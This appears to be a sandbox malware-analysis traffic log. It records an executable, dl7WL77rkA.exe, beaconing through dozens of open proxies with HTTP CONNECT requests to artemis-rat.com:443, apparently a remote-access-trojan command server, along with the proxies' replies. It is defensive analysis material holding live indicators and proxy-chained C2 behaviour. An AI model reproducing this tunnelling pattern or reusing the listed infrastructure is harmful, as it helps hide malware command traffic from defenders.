Mar 11, 2024 03:30:55.462956905 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.390310049 CET | 303 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1279192.168.2.553411103.190.54.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.203449011 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1280192.168.2.551830154.118.228.212803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.213255882 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1281192.168.2.553422138.36.150.2610803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.222978115 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.092528105 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1282192.168.2.553502152.32.187.16481183876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.223671913 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.822922945 CET | 131 | IN | HTTP/1.1 503 Too many open connections
Content-Type: text/plain
Connection: close
Data Ascii: Maximum number of open connections reached.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1283192.168.2.553415111.88.240.20110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.223809004 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1284192.168.2.552862206.189.145.23598673876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.224260092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939275026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.997054100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083513021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108254910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1285192.168.2.55286992.205.61.38241833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.225617886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1286192.168.2.553489103.166.141.74200743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.238193035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.593506098 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1287192.168.2.553509147.28.145.213100023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.238383055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.457787037 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1288192.168.2.55344460.211.195.150108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.238774061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1289192.168.2.55344994.20.183.172803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.238780975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.621969938 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1290192.168.2.55348751.161.131.84630553876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.242630005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.044800997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238976955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1291192.168.2.55343746.209.54.11080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.246335030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.685859919 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:54.819996119 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:55.919358969 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:57.222191095 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:59.680109978 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:04.677460909 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:14.673978090 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:34.487804890 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:34:14.194001913 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                                                                                                                                            1292192.168.2.553424113.204.4.142108003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.256616116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                                                                                                                                            1293192.168.2.552898185.132.179.7231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.266498089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.266673088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405417919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.462964058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.930130959 CET19INHTTP/1.1 200 OK


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                                                                                                                                            1294192.168.2.55353435.185.196.3831283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.268444061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.480669022 CET39INHTTP/1.1 200 Connection established


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                                                                                                                                            1295192.168.2.552929119.196.168.183803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.270539999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.570518970 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                                                                                                                                            1296192.168.2.55295492.205.110.11834143876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.272221088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.404846907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405580044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.462977886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1297192.168.2.55352251.222.241.157403513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.290503025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939038038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1298192.168.2.55353138.162.23.23031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.291800976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.740510941 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1299192.168.2.553004162.215.219.157481173876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.293189049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1300192.168.2.55351440.76.160.14390023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.300955057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1301192.168.2.55350593.171.220.22988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.302968025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.701910019 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1302192.168.2.551687147.12.46.6231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.306176901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
